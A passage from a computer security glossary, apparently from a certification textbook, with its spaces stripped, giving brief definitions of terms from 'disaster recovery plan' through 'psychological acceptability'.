disasterrecoveryplan(DRP)Awrittenplandevelopedtoaddresshowanorganizationwillreacttoanaturalormanmadedisasterinordertoensurebusinesscontinuity.Relatedtotheconceptofabusinesscontinuityplan(BCP).
discretionaryaccesscontrol(DAC)Anaccesscontrolmechanisminwhichtheownerofanobject(suchasafile)candecidewhichothersubjects(suchasotherusers)mayhaveaccesstotheobject,andwhataccess(read,write,execute)theseobjectscanhave.
distributeddenial-of-service(DDoS)attackAspecialtypeofDoSattackinwhichtheattackerelicitsthegenerallyunwillingsupportofothersystemstolaunchamany-against-oneattack.
diversityofdefenseTheapproachofcreatingdissimilarsecuritylayerssothatanintruderwhoisabletobreachonelayerwillbefacedwithan
entirelydifferentsetofdefensesatthenextlayer.
DNSkitingTheuseofaDNSrecordduringthepaymentgraceperiodwithoutpaying.
DomainKeysIdentifiedMail(DKIM)Anauthenticationsystemfore-maildesignedtodetectspoofingofe-mailaddresses.
DomainNameSystem(DNS)TheservicethattranslatesInternetdomainnames(suchaswww.mcgrawhill.com)intoIPaddresses.
DMZSeedemilitarizedzone.
drive-bydownloadattackAnattackonaninnocentvictimmachinewherecontentisdownloadedwithouttheuser’sknowledge.
DRPSeedisasterrecoveryplan.
DSSSSeedirect-sequencespreadspectrum.
duecareThedegreeofcarethatareasonablepersonwouldexerciseundersimilarcircumstances.
duediligenceThereasonablestepsapersonorentitywouldtakeinordertosatisfylegalorcontractualrequirements—commonlyusedwhenbuyingorsellingsomethingofsignificantvalue.
dumpsterdivingThepracticeofsearchingthroughtrashtodiscoversensitivematerialthathasbeenthrownawaybutnotdestroyedorshredded.
DynamicHostConfigurationProtocol(DHCP)AnInternetEngineeringTaskForce(IETF)InternetProtocol(IP)specificationforautomaticallyallocatingIPaddressesandotherconfigurationinformationbasedonnetworkadapteraddresses.Itenablesaddresspoolingand
allocationandsimplifiesTCP/IPinstallationandadministration.
dynamiclinklibrary(DLL)AsharedlibraryfunctionusedintheMicrosoftWindowsenvironment.
EAPSeeExtensibleAuthenticationProtocol.
economyofmechanismTheprinciplethatdesignsshouldbesmallandsimple.
electromagneticinterference(EMI)Thedisruptionorinterferenceofelectronicsduetoanelectromagneticfield.
elitehackerAhackerwhohastheskilllevelnecessarytodiscoverandexploitnewvulnerabilities.
ellipticcurvecryptography(ECC)Amethodofpublic-keycryptographybasedonthealgebraicstructureofellipticcurvesoverfinitefields.
ellipticcurveDiffie-HellmanEphemeral(ECDHE)AcryptographicmethodusingECCtoestablishasharedkeyoveraninsecuremediuminasecurefashionusingatemporarykeytoenableperfectforwardsecrecy(PFS).
EncapsulatingSecurityPayload(ESP)AportionoftheIPsecimplementationthatprovidesfordataconfidentialitywithoptionalauthenticationandreplaydetectionservices.ESPcompletelyencapsulatesuserdatainthedatagramandcanbeusedeitherbyitselforinconjunctionwithAuthenticationHeadersforvaryingdegreesofIPsecservices.
enclaveAsectionofanetworkthatservesaspecificpurposeandisisolatedbyprotocolsfromotherpartsofanetwork.
encryptionThereversibleprocessofrenderingdataunreadablethrough
theuseofanalgorithmandakey.
EncryptingFileSystem(EFS)AsecurityfeatureofWindows,fromWindows2000onward,thatenablesthetransparentencryption/decryptionoffilesonthesystem.
entropyThemeasureofuncertaintyassociatedwithaseriesofvalues.Perfectentropyequatestocompleterandomness,suchthatgivenanystringofbits,thereisnocomputationtoimproveguessingthenextbitinthesequence.
ephemeralkeysCryptographickeysthatareusedonlyonceaftertheyaregenerated.
escalationauditingTheprocessoflookingforanincreaseinprivileges,suchaswhenanordinaryuserobtainsadministrator-levelprivileges.
EthernetThecommonnamefortheIEEE802.3standardmethodofpacketcommunicationbetweentwonodesatlayer2.
evidenceThedocuments,verbalstatements,andmaterialobjectsadmissibleinacourtoflaw.
eviltwinAwirelessattackperformedusingasecond,roguewirelessaccesspointdesignedtomimicarealaccesspoint.
eXclusiveOR(XOR)Bitwisefunctioncommonlyusedincryptography.
exposurefactorAmeasureofthemagnitudeoflossofanasset.Usedinthecalculationofsinglelossexpectancy(SLE).
eXtensibleAccessControlMarkupLanguage(XACML)AnopenstandardXML-basedlanguageusedtodescribeaccesscontrol.
ExtensibleAuthenticationProtocol(EAP)Auniversalauthentication
frameworkusedinwirelessnetworksandpoint-to-pointconnections.ItisdefinedinRFC3748andhasbeenupdatedbyRFC5247.
ExtensibleMarkupLanguage(XML)Atext-based,human-readabledatamarkuplanguage.
fail-safedefaultsTheprinciplethatwhenasystemfails,thedefaultfailurestatewillbeasafestatebydesign.
falsenegativeTermusedwhenasystemmakesanerrorandmissesreportingtheexistenceofanitemthatshouldhavebeendetected.
falsepositiveTermusedwhenasecuritysystemmakesanerrorandincorrectlyreportstheexistenceofasearched-forobject.Examplesincludeanintrusiondetectionsystemthatmisidentifiesbenigntrafficashostile,anantivirusprogramthatreportstheexistenceofavirusinsoftwarethatactuallyisnotinfected,orabiometricsystemthatallowsaccesstoasystemtoanunauthorizedindividual.
faulttoleranceThecharacteristicsofasystemthatpermitittooperateevenwhensub-componentsoftheoverallsystemfail.
FHSSSeefrequency-hoppingspreadspectrum.
filesystemaccesscontrollist(FACL)Theimplementationofaccesscontrolsaspartofafilesystem.
FileTransferProtocol(FTP)Anapplication-levelprotocolusedtotransferfilesoveranetworkconnection.
FileTransferProtocolSecure(FTPS)Anapplication-levelprotocolusedtotransferfilesoveranetworkconnectionthatusesFTPoveranSSLorTLSconnection.
firewallAnetworkdeviceusedtosegregatetrafficbasedonrules.
floodguardAnetworkdevicethatblocksflooding-typeDoS/DDoSattacks,frequentlypartofanIDS/IPS.
footprintingThestepsatesterusestodeterminetherangeandscopeofasystem.
forensics(orcomputerforensics)Thepreservation,identification,documentation,andinterpretationofcomputerdataforuseinlegalproceedings.
freespaceSectorsonastoragemediumthatareavailablefortheoperatingsystemtouse.
frequency-hoppingspreadspectrum(FHSS)Amethodofdistributingacommunicationovermultiplefrequenciesovertimetoavoidinterferenceanddetection.
fullbackupAcompletebackupofallfilesandstructuresofasystemtoanotherlocation.
fulldiskencryption(FDE)Theapplicationofencryptiontoanentiredisk,protectingallofthecontentsinonecontainer.
fuzzingTheuseoflargequantitiesofdatatotestaninterfaceagainstsecurityvulnerabilities.(Alsoknownasfuzztesting.)
GenericRoutingEncapsulation(GRE)AtunnelingprotocoldesignedtoencapsulateawidevarietyofnetworklayerpacketsinsideIPtunnelingpackets.
geo-taggingThemetadatathatcontainslocation-specificinformationthatisattachedtootherdataelements.
GloballyUniqueIdentifier(GUID)Auniquereferencenumberusedasanidentifierofaniteminasystem.
GnuPrivacyGuard(GPG)AnapplicationprogramthatfollowstheopenPGPstandardforencryption.
greyboxtestingAformoftestingwherethetesterhaslimitedorpartialknowledgeoftheinnerworkingofasystem.
grouppolicyThemechanismthatallowsforcentralizedmanagementandconfigurationofcomputersandremoteusersinaMicrosoftActiveDirectoryenvironment.
grouppolicyobject(GPO)StoresthegrouppolicysettingsinaMicrosoftActiveDirectoryenvironment.
hackerApersonwhoperformshackingactivities.
hackingThetermusedbythemediatorefertotheprocessofgainingunauthorizedaccesstocomputersystemsandnetworks.Thetermhasalsobeenusedtorefertotheprocessofdelvingdeepintothecodeandprotocolsusedincomputersystemsandnetworks.Seealsocracking.
hactivistAhackerwhouseshisorherskillsforpoliticalpurposes.
harddiskdrive(HDD)Amechanicaldeviceusedforthestoringofdigitaldatainmagneticform.
hardeningTheprocessofstrengtheningahostlevelofsecuritybyperformingspecificsystempreparations.
hardwaresecuritymodule(HSM)Aphysicaldeviceusedtoprotectbutstillallowuseofcryptographickeys.Itisseparatefromthehostmachine.
hashFormofencryptionthatcreatesadigestofthedataputintothealgorithm.Thesealgorithmsarereferredtoasone-wayalgorithmsbecausethereisnofeasiblewaytodecryptwhathasbeenencrypted.
hashedmessageauthenticationcode(HMAC)Theuseofacryptographichashfunctionandamessageauthenticationcodetoensuretheintegrityandauthenticityofamessage.
hashvalueSeemessagedigest.
hazardAhazardisasituationthatincreasesrisk.
HDDSeeharddiskdrive.
heating,ventilation,airconditioning(HVAC)Thesystemsusedtoheatandcoolairinabuildingorstructure.
HIDSSeehost-basedintrusiondetectionsystem.
hierarchicaltrustmodelAtrustmodelthathaslevelsortiersofanascendingnature.
highlystructuredthreatAthreatthatisbackedbythetimeandresourcestoallowvirtuallyanyformofattack.
HIPSSeehost-basedintrusionpreventionsystem.
honeynetAnetworkversionofahoneypot,orasetofhoneypotsnetworkedtogether.
honeypotAcomputersystemorportionofanetworkthathasbeensetuptoattractpotentialintruders,inthehopethattheywillleavetheothersystemsalone.Sincetherearenolegitimateusersofthissystem,anyattempttoaccessitisanindicationofunauthorizedactivityandprovidesaneasymechanismtospotattacks.
host-basedintrusiondetectionsystem(HIDS)AsystemthatlooksforcomputerintrusionsbymonitoringactivityononeormoreindividualPCsorservers.
host-basedintrusionpreventionsystem(HIPS)AsystemthatautomaticallyrespondstocomputerintrusionsbymonitoringactivityononeormoreindividualPCsorserversandwiththeresponsebeingbasedonaruleset.
hostsecuritySecurityfunctionalitythatispresentonahostsystem.
hotfixAsetofupdatesdesignedtofixaspecificproblem.
hotsiteAbackupsitethatisfullyconfiguredwithequipmentanddataandisreadytoimmediatelyaccepttransferofoperationalprocessingintheeventoffailureoftheoperationalsystem.
HSMSeehardwaresecuritymodule.
hubAnetworkdeviceusedtoconnectdevicesatthephysicallayeroftheOSImodel.
hybridtrustmodelAcombinationoftrustmodelsincludingmesh,hierarchical,andnetwork.
HypertextMarkupLanguage(HTML)AprotocolusedtomarkuptextforuseacrossHTTP.
HypertextTransferProtocol(HTTP)AprotocolfortransferofmaterialacrosstheInternetthatcontainslinkstoadditionalmaterial.
HypertextTransferProtocoloverSSL/TLS(HTTPS)AprotocolfortransferofmaterialacrosstheInternetthatcontainslinkstoadditionalmaterialthatiscarriedoverasecuretunnelviaSSLorTLS.
ICMPSeeInternetControlMessageProtocol.
IDEASeeInternationalDataEncryptionAlgorithm.
identificationTheprocessofdeterminingidentityaspartofidentitymanagementandaccesscontrol.Usuallyperformedonlyonce,whentheuserIDisassigned.
IEEESeeInstituteforElectricalandElectronicsEngineers.
IEEE802.11Afamilyofstandardsthatdescribenetworkprotocolsforwirelessdevices.
IEEE802.1XAnIEEEstandardforperformingauthenticationovernetworks.
IETFSeeInternetEngineeringTaskForce.
IKESeeInternetKeyExchange.
impactTheresultofavulnerabilitybeingexploitedbyathreat,resultinginaloss.
implicitdenyAphilosophythatallactionsareprohibitedunlessspecificallyauthorized.
incidentAsituationthatisdifferentthannormalforaspecificcircumstance.
incidentresponseTheprocessofrespondingto,containing,analyzing,andrecoveringfromacomputer-relatedincident.
incrementalbackupAbackupmodelwherefilesthathavechangedsincelastfullorincrementalbackuparebackedup.
IndicatorofCompromise(IOC)Asetofconditionsorevidencethatindicatesasystemmayhavebeencompromised.
informationcriticalityAnassessmentofthevalueofspecificelements
ofinformationandthesystemsthathandleit.
informationsecurityOftenusedsynonymouslywithcomputersecuritybutplacestheemphasisontheprotectionoftheinformationthatthesystemprocessesandstores,insteadofonthehardwareandsoftwarethatconstitutethesystem.
informationwarfareTheuseofinformationsecuritytechniques,bothoffensiveanddefensive,whencombatinganopponent.
InfrastructureasaService(IaaS)Theautomatic,on-demandprovisioningofinfrastructureelements,operatingasaservice;acommonelementofcloudcomputing.
initializationvector(IV)Adatavalueusedtoseedacryptographicalgorithm,providingforameasureofrandomness.
instantmessaging(IM)Atext-basedmethodofcommunicatingovertheInternet.
InstituteforElectricalandElectronicsEngineers(IEEE)Anonprofit,technical,professionalinstituteassociatedwithcomputerresearch,standards,andconferences.
intangibleassetAnassetforwhichamonetaryequivalentisdifficultorimpossibletodetermine.Examplesarebrandrecognitionandgoodwill.
integeroverflowAnerrorconditioncausedbythemismatchbetweenavariableassignedstoragesizeandthesizeofthevaluebeingmanipulated.
integrityPartoftheCIAofsecurity,thesecurityprinciplethatrequiresthatinformationisnotmodifiedexceptbyindividualsauthorizedtodoso.
interconnectionsecurityagreement(ISA)Anagreementbetweenpartiestoestablishproceduresformutualcooperationandcoordination
betweenthemwithrespecttosecurityrequirementsassociatedwiththeirjointproject.
InternationalDataEncryptionAlgorithm(IDEA)Asymmetricencryptionalgorithmusedinavarietyofsystemsforbulkencryptionservices.
InternetAssignedNumbersAuthority(IANA)ThecentralcoordinatorfortheassignmentofuniqueparametervaluesforInternetprotocols.TheIANAischarteredbytheInternetSociety(ISOC)toactastheclearinghousetoassignandcoordinatetheuseofnumerousInternetprotocolparameters.
InternetControlMessageProtocol(ICMP)OneofthecoreprotocolsoftheTCP/IPprotocolsuite,usedforerrorreportingandstatusmessages.
InternetEngineeringTaskForce(IETF)Alargeinternationalcommunityofnetworkdesigners,operators,vendors,andresearchers,opentoanyinterestedindividualconcernedwiththeevolutionoftheInternetarchitectureandthesmoothoperationoftheInternet.TheactualtechnicalworkoftheIETFisdoneinitsworkinggroups,whichareorganizedbytopicintoseveralareas(suchasrouting,transport,andsecurity).Muchoftheworkishandledviamailinglists,withmeetingsheldthreetimesperyear.
InternetKeyExchange(IKE)TheprotocolformerlyknownasISAKMP/Oakley,definedinRFC2409.AhybridprotocolthatusespartoftheOakleyandpartoftheSecureKeyExchangeMechanismforInternet(SKEMI)protocolsuitesinsidetheInternetSecurityAssociationandKeyManagementProtocol(ISAKMP)framework.IKEisusedtoestablishasharedsecuritypolicyandauthenticatedkeysforservicesthatrequirekeys(suchasIPsec).
InternetMessageAccessProtocolVersion4(IMAP4)Oneoftwo
commonInternetstandardprotocolsfore-mailretrieval.
InternetProtocol(IP)ThenetworklayerprotocolusedbytheInternetforroutingpacketsacrossanetwork.
InternetProtocolSecurity(IPsec)AprotocolusedtosecureIPpacketsduringtransmissionacrossanetwork.IPsecoffersauthentication,integrity,andconfidentialityservicesandusesAuthenticationHeaders(AH)andEncapsulatingSecurityPayload(ESP)toaccomplishthisfunctionality.
InternetSecurityAssociationandKeyManagementProtocol(ISAKMP)Aprotocolframeworkthatdefinesthemechanicsofimplementingakeyexchangeprotocolandnegotiationofasecuritypolicy.
Internetserviceprovider(ISP)AtelecommunicationsfirmthatprovidesaccesstotheInternet.
intrusiondetectionsystem(IDS)Asystemtoidentifysuspicious,malicious,orundesirableactivitythatindicatesabreachincomputersecurity.
intrusionpreventionsystem(IPS)Asystemtoidentifysuspicious,malicious,orundesirableactivitythatindicatesabreachincomputersecurityandrespondautomaticallywithoutspecifichumaninteraction.
IPsecSeeInternetProtocolSecurity.
ISASeeinterconnectionsecurityagreement.
ISAKMP/OakleySeeInternetKeyExchange.
jailbreakingTheprocessofbreakingOSsecurityfeaturesdesignedtolimitinteractionswiththeOSitself.Commonlyperformedonmobile
phonestounlockfeaturesorbreaklockstocarriers.
KerberosAnetworkauthenticationprotocoldesignedbyMITforuseinclient/serverenvironments.
keyIncryptography,asequenceofcharactersorbitsusedbyanalgorithmtoencryptordecryptamessage.
keyarchivingTheprocessesandprocedurestomakeasecurebackupofcryptographickeys.
keydistributioncenter(KDC)AportionoftheKerberosauthenticationsystem.
keyescrowTheprocessofplacingacopyofcryptographickeyswithatrustedthirdpartyforbackuppurposes.
keyrecoveryAprocessbywherelostkeyscanberecoveredfromastoredsecret.
keyspaceTheentiresetofallpossiblekeysforaspecificencryptionalgorithm.
keystretchingAmechanismthattakeswhatwouldbeweakkeysand“stretches”themtomakethesystemmoresecureagainstbrute-forceattacks.
Layer2TunnelingProtocol(L2TP)ACiscoswitchingprotocolthatoperatesatthedatalinklayer.
layeredsecurityThearrangementofmultiplelayersofdefense,aformofdefenseindepth.
LDAPSeeLightweightDirectoryAccessProtocol.
leastcommonmechanismTheprinciplewhereprotectionmechanismsshouldbesharedtotheleastdegreepossibleamongusers.
leastprivilegeAsecurityprincipleinwhichauserisprovidedwiththeminimumsetofrightsandprivilegesthatheorsheneedstoperformrequiredfunctions.Thegoalistolimitthepotentialdamagethatanyusercancause.
LightweightDirectoryAccessProtocol(LDAP)AnapplicationprotocolusedtoaccessdirectoryservicesacrossaTCP/IPnetwork.
LightweightExtensibleAuthenticationProtocol(LEAP)AversionofEAPdevelopedbyCiscopriorto802.11itopush802.1XandWEPadoption.
linearcryptanalysisTheuseoflinearfunctionstoapproximateacryptographicfunctionasameansofanalysis.
loadbalancerAnetworkdevicethatdistributescomputingacrossmultiplecomputers.
localareanetwork(LAN)Agroupingofcomputersinanetworkstructureconfinedtoalimitedareaandusingspecificprotocols,suchasEthernetforOSILayer2trafficaddressing.
localregistrationauthorityARegistrationAuthority(RA)thatispartofalocalunitorenterprise.Itistypicallyonlyusefulwithintheenterprise,butinmanycasesthiscanbesufficient.
logicbombAformofmaliciouscodeorsoftwarethatistriggeredbyaspecificeventorcondition.Seealsotimebomb.
loopprotectionTherequirementtopreventbridgeloopsattheLayer2level,whichistypicallyresolvedusingtheSpanningTreealgorithmonswitchdevices.
Low-Water-MarkpolicyAnintegrity-basedinformationsecuritymodelderivedfromtheBell–LaPadulamodel.
MACSeemandatoryaccesscontrolorMediaAccessControl.
MACfilteringTheuseoflayer2MACaddressestofiltertraffictoonlyauthorizedNICcards.
malwareAclassofsoftwarethatisdesignedtocauseharm.
mandatoryaccesscontrol(MAC)Anaccesscontrolmechanisminwhichthesecuritymechanismcontrolsaccesstoallobjects(files),andindividualsubjects(processesorusers)cannotchangethataccess.
man-in-the-middleattackAnyattackthatattemptstouseanetworknodeastheintermediarybetweentwoothernodes.Eachoftheendpointnodesthinksitistalkingdirectlytotheother,buteachisactuallytalkingtotheintermediary.
masterbootrecord(MBR)AstripofdataonaharddriveinWindowssystems,meanttoresultinspecificinitialfunctionsoridentification.
maximumtransmissionunit(MTU)Ameasureofthelargestpayloadthataparticularprotocolcancarryinasinglepacketinaspecificinstance.
MD5MessageDigest5,ahashingalgorithmandaspecificmethodofproducingamessagedigest.
meantimebetweenfailure(MTBF)Thestatisticallydeterminedperiodoftimebetweenfailuresofthesystem.
meantimetofailure(MTTF)Thestatisticallydeterminedtimetothenextfailure.
meantimetorepair(MTTR)Acommonmeasureofhowlongittakes
torepairagivenfailure.Thisistheaveragetime,andmayormaynotincludethetimeneededtoobtainparts.
MediaAccessControl(MAC)addressThedatalinklayeraddressforlocalnetworkaddressing.
memorandumofunderstanding(MOU)Adocumentexecutedbetweentwopartiesthatdefinessomeformofagreement.
messageauthenticationcode(MAC)Ashortpieceofdatausedtoauthenticateamessage.Seehashedmessageauthenticationcode.
messagedigestTheresultofapplyingahashfunctiontodata.Sometimesalsocalledahashvalue.Seehash.
metropolitanareanetwork(MAN)AcollectionofnetworksinterconnectedinametropolitanareaandusuallyconnectedtotheInternet.
MicrosoftChallenge-HandshakeAuthenticationProtocol(MSCHAP)AMicrosoft-developedvariantoftheChallenge-HandshakeAuthenticationProtocol(CHAP).
mitigateActiontakentoreducethelikelihoodofathreatoccurring.
modemAmodulator/demodulatorthatisdesignedtoconnectmachinesviatelephone-basedcircuits.
MonitoringasaService(MaaS)Theuseofathirdpartytoprovidesecuritymonitoringservices.
MSCHAPSeeMicrosoftChallenge-HandshakeAuthenticationProtocol.
MTBFSeemeantimebetweenfailure.
MTTFSeemeantimetofailure.
MTTRSeemeantimetorepair.
multipleencryptionTheuseofmultiplelayersofencryptiontoimproveencryptionstrength.
multiple-factorauthenticationTheuseofmorethanonefactorasproofintheauthenticationprocess.
MultipurposeInternetMailExtensions(MIME)Astandardthatdescribeshowtoencodeandattachnon-textualelementsinane-mail.
NACSeenetworkaccesscontrolorNetworkAdmissionControl.
NAPSeeNetworkAccessProtection.
NATSeeNetworkAddressTranslation.
NationalInstituteofStandardsandTechnology(NIST)AU.S.governmentagencyresponsibleforstandardsandtechnology.
NDASeenon-disclosureagreement.
nearfieldcommunication(NFC)Asetofstandardsandprotocolsforestablishingacommunicationlinkoververyshortdistances.Usedinmobiledevices.
networkaccesscontrol(NAC)Anapproachtoendpointsecuritythatinvolvesmonitoringandremediatingendpointsecurityissuesbeforeallowinganobjecttoconnecttoanetwork.
NetworkAccessProtection(NAP)AMicrosoftapproachtonetworkaccesscontrol.
NetworkAddressTranslation(NAT)AmethodofreaddressingpacketsinanetworkatagatewaypointtoenabletheuseoflocalnonroutableIPaddressesoverapublicnetworksuchastheInternet.
NetworkAdmissionControl(NAC)TheCiscotechnologyapproachforgenericnetworkaccesscontrol.
NetworkAttachedStorage(NAS)Theconnectionofstoragetoasystemviaanetworkconnection.
network-basedintrusiondetectionsystem(NIDS)Asystemforexaminingnetworktraffictoidentifysuspicious,malicious,orundesirablebehavior.
network-basedintrusionpreventionsystem(NIPS)Asystemthatexaminesnetworktrafficandautomaticallyrespondstocomputerintrusions.
NetworkBasicInput/OutputSystem(NetBIOS)Asystemthatprovidescommunicationservicesacrossalocalareanetwork.
networkforensicsTheapplicationofdigitalforensicsprocessestonetworktraffic.
networkinterfacecard(NIC)ApieceofhardwaredesignedtoconnectmachinesatthephysicallayeroftheOSImodel.
networkoperatingsystem(NOS)Anoperatingsystemthatincludesadditionalfunctionsandcapabilitiestoassistinconnectingcomputersanddevices,suchasprinters,toalocalareanetwork.
networkoperationscenter(NOC)Acontrolpointfromwherenetworkperformancecanbemonitoredandmanaged.
networksegmentationTheseparationofanetworkintoseparate
addressablesegmentstolimitnetworktraffictraversaltoareasoflimitedscope.
networktapAconnectiontoanetworkthatallowssampling,duplication,andcollectionoftraffic.
NetworkTimeProtocol(NTP)Aprotocolforthetransmissionoftimesynchronizationpacketsoveranetwork.
networkvulnerabilityscannerTheapplicationofvulnerabilityscanningtonetworkdevicestosearchforvulnerabilitiesatthenetworklevel.
NewTechnologyFileSystem(NTFS)AproprietaryfilesystemdevelopedbyMicrosoft,introducedin1993,thatsupportsawidevarietyoffileoperationsonservers,PCs,andmedia.
NewTechnologyLANMAN(NTLM)AdeprecatedsecuritysuitefromMicrosoftthatprovidesauthentication,integrity,andconfidentialityforusers.Becauseitdoesnotsupportcurrentcryptographicmethods,itisnolongerrecommendedforuse.
next-generationfirewallFirewalltechnologybasedonpacketcontentsasopposedtosimpleaddressandportinformation.
NFCSeenearfieldcommunication.
NICSeenetworkinterfacecard.
NISTSeeNationalInstituteofStandardsandTechnology.
non-disclosureagreement(NDA)Alegalcontractbetweenpartiesdetailingtherestrictionsandrequirementsbornebyeachpartywithrespecttoconfidentialityissuespertainingtoinformationtobeshared.
nonrepudiationTheabilitytoverifythatanoperationhasbeenperformedbyaparticularpersonoraccount.Thisisasystempropertythatpreventsthepartiestoatransactionfromsubsequentlydenyinginvolvementinthetransaction.
nullsessionThewayinwhichMicrosoftWindowsrepresentsanunauthenticatedconnection.
OakleyprotocolAkeyexchangeprotocolthatdefineshowtoacquireauthenticatedkeyingmaterialbasedontheDiffie-Hellmankeyexchangealgorithm.
objectreuseAssignmentofapreviouslyusedmediumtoasubject.Thesecurityimplicationisthatbeforeitisprovidedtothesubject,anydatapresentfromaprevioususermustbecleared.
one-timepadAnunbreakableencryptionschemeinwhichaseriesofnonrepeating,randombitsisusedonceasakeytoencryptamessage.Sinceeachpadisusedonlyonce,nopatterncanbeestablishedandtraditionalcryptanalysistechniquesarenoteffective.
OnlineCertificateStatusProtocol(OSCP)Aprotocolusedtorequesttherevocationstatusofadigitalcertificate.Thisisanalternativetocertificaterevocationlists.
opendesignTheprinciplethatprotectionmechanismsshouldnotdependuponsecrecyofdesignforsecurity.
openrelayAmailserverthatreceivesandforwardsmailfromoutsidesources.
OpenVulnerabilityandAssessmentLanguage(OVAL)AnXML-basedstandardforthecommunicationofsecurityinformationbetweentoolsandservices.
operatingsystem(OS)Thebasicsoftwarethathandlesinput,output,display,memorymanagement,andalltheotherhighlydetailedtasksrequiredtosupporttheuserenvironmentandassociatedapplications.
operationalmodelofcomputersecurityStructuringactivitiesintoprevention,detection,andresponse.
optinTheprimaryprivacystandardintheEU,whereapartymustoptintosharing,otherwisethedefaultoptionisnottosharetheinformationorgivepermissionforotheruse.
optoutTheprimaryprivacystandardintheUS,whereapartymustoptoutofsharing;otherwise,thedefaultoptionistosharetheinformationandgivepermissionforotheruse.
OrangeBookThenamecommonlyusedtorefertothenowoutdatedDepartmentofDefenseTrustedComputerSecurityEvaluationCriteria(TCSEC).
OVALSeeOpenVulnerabilityandAssessmentLanguage.
P2PSeepeer-to-peer.
PACSeeProxyAutoConfiguration.
PacketCapture(PCAP)Themethodsandfilesassociatedwiththecaptureofnetworktraffic,intheformoftextfiles.
PAMSeePluggableAuthenticationModules.
pan-tilt-zoom(PTZ)Atermusedtodescribeavideocamerathatsupportsremotedirectionalandzoomcontrol.
PAPSeePasswordAuthenticationProtocol.
passwordAstringofcharactersusedtoproveanindividual’sidentitytoasystemorobject.UsedinconjunctionwithauserID,itisthemostcommonmethodofauthentication.Thepasswordshouldbekeptsecretbytheindividualwhoownsit.
PasswordAuthenticationProtocol(PAP)Asimpleprotocolusedtoauthenticateausertoanetworkaccessserver.
Password-BasedKeyDerivationFunction2(PBKDF2)AkeyderivationfunctionthatispartoftheRSALaboratoriesPublicKeyCryptographyStandards,publishedasIETFRFC2898.
patchAreplacementsetofcodedesignedtocorrectproblemsorvulnerabilitiesinexistingsoftware.
PBXSeeprivatebranchexchange.
peer-to-peer(P2P)Anetworkconnectionmethodologyinvolvingdirectconnectionfrompeertopeer.
peer-to-peertrustmodelAtrustmodelbuiltuponactualpeer-to-peerconnectionandcommunicationtoestablishtrust.
penetrationtestingAsecuritytestinwhichanattemptismadetocircumventsecuritycontrolsinordertodiscovervulnerabilitiesandweaknesses.Alsocalledapentest.
permissionsAuthorizedactionsasubjectcanperformonanobject.Seealsoaccesscontrols.
personalelectronicdevice(PED)Atermusedtodescribeanelectronicdevice,ownedbytheuserandbroughtintotheenterprise,thatusesenterprisedata.Thisincludeslaptops,tablets,andmobilephones,tonameafew.
PersonalIdentityVerification(PIV)Policies,procedures,hardware,andsoftwareusedtosecurelyidentifyfederalworkers.
personallyidentifiableinformation(PII)Informationthatcanbeusedtoidentifyasingleperson.
pharmingTheuseofafakewebsitetosociallyengineersomeoneoutofcredentials.
phishingTheuseofsocialengineeringtotrickauserintorespondingtosomethingsuchasane-mailtoinstantiateamalware-basedattack.
phreakingUsedinthemediatorefertothehackingofcomputersystemsandnetworksassociatedwiththephonecompany.Seealsocracking.
physicalsecurityThepolicies,procedures,andactionstakentoregulateactualphysicalaccesstoandtheenvironmentofcomputingequipment.
PIDSeeprocessidentifier.
piggybackingAsocialengineeringtechniquethatinvolvesfollowingacredentialedpersonthroughacheckpointtopreventhavingtopresentcredentials—i.e.,followingsomeonethroughadooryouneedabadgetoopen,effectivelyusingtheirbadgeforentry.
PIISeepersonallyidentifiableinformation.
pingsweepTheuseofaseriesofICMPpingmessagestomapoutanetwork.
PlainOldTelephoneService(POTS)Thetermusedtodescribetheoldanalogphoneserviceandlaterthe“landline”digitalphoneservice.
plaintextIncryptography,apieceofdatathatisnotencrypted.Itcanalsomeanthedatainputintoanencryptionalgorithmthatwouldoutput
ciphertext.
PlatformasaService(PaaS)Theconceptofhavingprovisionableoperationalplatformsthatcanbeobtainedviaaservice.
PluggableAuthenticationModules(PAM)AmechanismusedinLinuxsystemstointegratelow-levelauthenticationmethodsintoanAPI.
Point-to-PointProtocol(PPP)TheInternetstandardfortransmissionofIPpacketsoveraserialline,asinadial-upconnectiontoanISP.
Point-to-PointProtocolExtensibleAuthenticationProtocol(PPPEAP)Astandardmethodfortransportingmulti-protocoldatagramsoverpoint-to-pointlinks.
Point-to-PointProtocolPasswordAuthenticationProtocol(PPPPAP)PAPisaPPPextensionthatprovidessupportforpasswordauthenticationmethodsoverPPP.
Point-to-PointTunnelingProtocol(PPTP)TheuseofgenericroutingencapsulationoverPPPtocreateamethodologyusedforvirtualprivatenetworking.
PortAddressTranslation(PAT)ThemanipulationofportinformationinanIPdatagramatapointinthenetworktomapportsinafashionsimilartoNetworkAddressTranslation’schangeofnetworkaddress.
portscanTheexaminationofTCPandUDPportstodeterminewhichareopenandwhatservicesarerunning.
pre-sharedkey(PSK)Asharedsecretthathasbeenpreviouslysharedbetweenpartiesandisusedtoestablishasecurechannel.
PrettyGoodPrivacy(PGP)Apopularencryptionprogramthathastheabilitytoencryptanddigitallysigne-mailandfiles.
preventativeintrusiondetectionAsystemthatdetectshostileactionsornetworkactivityandpreventsthemfromimpactinginformationsystems.
privacyProtectinganindividual’spersonalinformationfromthosenotauthorizedtoseeit.
privacy-enhancingtechnologyCryptographicprotectionmechanismsemployedtoensureprivacyofinformation.
privacyimpactassessment(PIA)Theprocessandprocedureofdeterminingtheprivacyimpactandsubsequentriskofdataelementsandtheiruseintheenterprise.
privatebranchexchange(PBX)Atelephoneexchangethatservesaspecificbusinessorentity.
privilegeauditingTheprocessofcheckingtherightsandprivilegesassignedtoaspecificaccountorgroupofaccounts.
privilegemanagementTheprocessofrestrictingauser’sabilitytointeractwiththecomputersystem.
processidentifier(PID)Auniqueidentifierforaprocessthreadintheoperatingsystemkernel.
ProtectedExtensibleAuthenticationProtocol(PEAP)AprotectedversionofEAPdevelopedbyCisco,Microsoft,andRSASecuritythatfunctionsbyencapsulatingtheEAPframesinaTLStunnel.
ProtectedHealthInformation(PHI)Informationthatcandisclosehealth-relateditemsforanindividualthatmustbeprotectedinthesystem.SimilartoPIIbuthealthrelatedinnature.
protocolanalyzerAtoolusedbynetworkpersonneltoidentifypacketsandheaderinformationduringnetworktransit.Theprimaryuseisin
troubleshootingnetworkcommunicationissues.
ProxyAutoConfiguration(PAC)AmethodofautomatingtheconnectionofwebbrowserstoappropriateproxyservicestoretrieveaspecificURL.
proxyserverAserverthatactsasaproxyforindividualrequestsandisusedforperformanceandsecuritypurposesinascalablefashion.
PSKSeepre-sharedkey.
psychologicalacceptabilityTheprinciplethatprotectionmechanismsshouldnotimpactusers,oriftheydo,theimpactshouldbeminimal.
